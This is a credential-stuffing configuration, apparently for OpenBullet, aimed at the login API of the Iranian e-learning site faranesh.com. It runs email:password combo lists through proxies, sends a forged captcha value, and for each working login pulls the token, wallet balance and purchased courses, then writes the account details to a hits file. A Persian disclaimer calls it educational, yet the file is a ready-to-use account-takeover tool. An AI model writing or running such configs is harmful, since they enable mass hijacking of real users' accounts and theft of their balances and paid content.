[SETTINGS]
{
  "Name": "Faranesh.com",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2020-08-23T12:22:23.2975394+04:30",
  "AdditionalInfo": "این کانفیگ صرفا برای یادگیری و مقابله با تست نفوذ و همچنین پچ شدن باگ پابلیک میشود | هرگونه استفاده نادرست از این باگ به عهده خود استفاده کننده میباشد و پیدا کننده باگ هیچ مسئولیتی در قبال استفاده نادرست شما ندارد",
  "Author": "TheOwn",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": true,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Lenght FUNCTION Length "{\"email\": \"<USER>\",\"password\": \"<PASS>\",\"g-recaptcha-response\": \"true\",\"mobile_request\": true}" -> VAR "Lenght" 

#POST REQUEST POST "https://api.faranesh.com/v1/auth/login" 
  CONTENT "{\"email\": \"<USER>\",\"password\": \"<PASS>\",\"g-recaptcha-response\": \"true\",\"mobile_request\": true}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: fa,en;q=0.9,en-US;q=0.8" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: <Lenght>" 
  HEADER "Host: api.faranesh.com" 
  HEADER "Origin: https://faranesh.com" 
  HEADER "Referer: https://faranesh.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "token" 
  KEYCHAIN Failure OR 
    KEY "{\"message\":\"\\u0642\\u0628\\u0644\\u0627 \\u0628\\u0627 \\u0627\\u06cc\\u0646 \\u0627\\u06cc\\u0645\\u06cc\\u0644 \\u062b\\u0628\\u062a\\u200c\\u0646\\u0627\\u0645 \\u06a9\\u0631\\u062f\\u0647\\u200c\\u0627\\u06cc\\u062f\\u061b \\u0648\\u0644\\u06cc \\u0631\\u0645\\u0632 \\u0639\\u0628\\u0648\\u0631 \\u0635\\u062d\\u06cc\\u062d \\u0646\\u06cc\\u0633\\u062a\"}" 
    KEY "{\"message\":\"\\u0644\\u0637\\u0641\\u0627 \\u0622\\u062f\\u0631\\u0633 \\u0627\\u06cc\\u0645\\u06cc\\u0644 \\u06cc\\u0627 \\u0634\\u0645\\u0627\\u0631\\u0647 \\u0647\\u0645\\u0631\\u0627\\u0647\\u062a\\u0627\\u0646 \\u0631\\u0627 \\u0648\\u0627\\u0631\\u062f \\u0646\\u0645\\u0627\\u06cc\\u06cc\\u062f.\"}" 

#token PARSE "<SOURCE>" JSON "token" -> VAR "Token" 

#Get_Balance REQUEST GET "https://api.faranesh.com/v1/user/info" 
  
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: fa,en;q=0.9,en-US;q=0.8" 
  HEADER "Authorization: Bearer <Token>" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: api.faranesh.com" 
  HEADER "If-None-Match: W/\"8a4b2cdeea7a9e7e366d320981a4e64466bc1c96\"" 
  HEADER "Origin: https://faranesh.com" 
  HEADER "Referer: https://faranesh.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 

#Balance PARSE "<SOURCE>" JSON "balance" CreateEmpty=FALSE -> CAP "Balance" "" " Toman" 

#Pakages REQUEST GET "https://api.faranesh.com/v1/dashboard/mycourses/" 
  
  HEADER "Host: api.faranesh.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Authorization: Bearer <Token>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 
  HEADER "Origin: https://faranesh.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://faranesh.com/dashboard/learning" 
  HEADER "Accept-Language: fa,en;q=0.9,en-US;q=0.8" 
  HEADER "If-None-Match: W/\"991b0fcc29223c0eb14be271e2de40d8515d495a\"" 
  HEADER "Accept-Encoding: gzip, deflate" 

#GetS PARSE "<SOURCE>" LR "" "" -> VAR "GetS" 

#Cap1 FUNCTION Unescape "<GetS>" -> VAR "Cap1" 

#Pakages PARSE "<Cap1>" JSON "title" Recursive=TRUE CreateEmpty=FALSE -> CAP "Pakages" 

#R1 FUNCTION Replace "[" "" "<Pakages>" -> VAR "R1" 

#R2 FUNCTION Replace "]" "" "<R1>" -> VAR "R2" 

#R3 FUNCTION Replace "," "\\n" "<R2>" -> VAR "R3" 

#R4 FUNCTION CountOccurrences "\\n" "<R3>" -> VAR "R4" 

#Number_Of_Pakage FUNCTION Compute "<R4>+1" -> CAP "Number Of Pakage" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<R4>" Contains "0" 

#Save UTILITY File "Faranesh.txt" AppendLines "<<<<<<=Account=>>>>>>\\nCombo: <USER>:<PASS> \\nEmail\\Username: <USER> \\nPassword: <PASS>\\n<<<<<<=Pakages=>>>>>>\\nNumber Of Pakage: <Number Of Pakage>\\nBalance: <Balance>\\n<R3>\\n==========================================================" -> VAR "Save" 

